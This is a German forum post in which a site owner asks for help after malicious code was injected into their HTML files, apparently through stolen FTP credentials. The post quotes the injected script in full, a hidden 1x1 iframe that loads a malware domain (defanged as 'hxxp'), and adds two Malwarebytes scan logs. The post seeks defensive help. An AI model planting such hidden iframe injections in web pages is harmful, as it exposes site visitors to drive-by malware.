Malware-Code "online-alles.net" in HTML-Seiten - Trojaner?

scherli

Hallo zusammen,

ich sitze gerade ziemlich ratlos vor dem Rechner und erhoffe mir hier eine "Erleuchtung".

In einigen Webseiten - ausschließlich HTML-Dateien - auf die ich per FTP zugreife, hat sich der nachfolgende Code eingeschlichen, wegen dem zum einen Google Adwords die entsprechenden Kampagnen blockt und zum anderen Kunden Warnungen bekommen, dass die Seiten schädlich sind:

<body><!--c3284d--><script>var url="hxxp://online-alles.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibili ty: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

Leider bin ich beim Googeln nicht weiter gekommen, denn die Verlinkung zu online-alles.net als Malware wird kaum thematisiert.

Auf Nachfrage beim Support des Providers HostEurope wurde ich darauf verwiesen, dass ich vermutlich einen Trojaner auf dem Rechner habe, der die FTP-Passwörter ausspioniert und es ermöglicht hat, dass der oben gepostete Code am 17.6.2012 in die HTML-Dateien eingefügt wurde. Als FTP-Client nutze ich hauptsächlich FlashFXP, zum anderen aber auch den Client von Firefox.

Ich habe mich hier am Board etwas umgeschaut und habe nun mit Malwarebytes sowohl den Laptop als auch den Bürorechner auf Trojaner gecheckt und wurde auch fündig. Nachfolgend poste ich die beiden Logfiles und hoffe, dass mir jemand sagen kann, was ich mir da eingefangen hatte und ob einer dieser Trojaner die Passwörter abgefangen haben könnte. Oder habe ich womöglch noch etwas auf dem Rechner, was Malwarebytes nicht gefunden hat?

Ich hatte zuvor schon, bevor ich auf dieses Forum gestoßen bin, mit TrojanHunter mein System gecheckt. Damit wurden angebliche Trojaner in alten Download-Dateien aus den Jahren 2007-2009 gefunden, die ich daraufhin gelöscht habe. Glaube aber nicht, dass sich die Auslöser drunter befunden haben.

Es wäre toll, wenn mir hier jemand hilfreich unter die Arme greifen könnte.

LOGFILE LAPTOP:

Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.02.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
Max Mustermann: XXXX-LAPTOP2011 [Administrator]

02.08.2012 16:20:52
mbam-log-2012-08-02 (16-20-52).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 219066
Laufzeit: 3 Minute(n), 33 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 13
HKCR\CLSID\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\TypeLib\{BB7256DD-EBA9-480B-8441-A00388C2BEC3} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\Interface\{3D782BB2-F2A5-11D3-BF4C-000000000000} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncherBHO.1 (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncherBHO (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\CLSID\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncher.1 (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncher (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 2
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar|{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Daten: StartSearchTB -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Daten: -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateiobjekte der Registrierung: 1
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main|Start Page (Hijack.StartPage) -> Bösartig: (hxxp://startsear.ch/) Gut: (hxxp://www.google.com) -> Erfolgreich ersetzt und in Quarantäne gestellt.

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 1
C:\Program Files (x86)\vShare.tv plugin\ssBarLcher.dll (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)


LOGFILE BÜRO

Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.02.07

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19272
Max Mustermann:: XXXX-OFFICE [Administrator]

02.08.2012 16:50:28
mbam-log-2012-08-02 (16-50-28).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 229011
Laufzeit: 9 Minute(n), 2 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Free Registry Cleaner for Vista_is1 (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 2
C:\Program Files\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateien: 6
C:\Program Files\Free Registry Cleaner for Vista\backuphkcu.REG (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\RegCleanerForVista.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\unins000.dat (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\unins000.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Uninstall Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)


Danke und Gruß
Scherli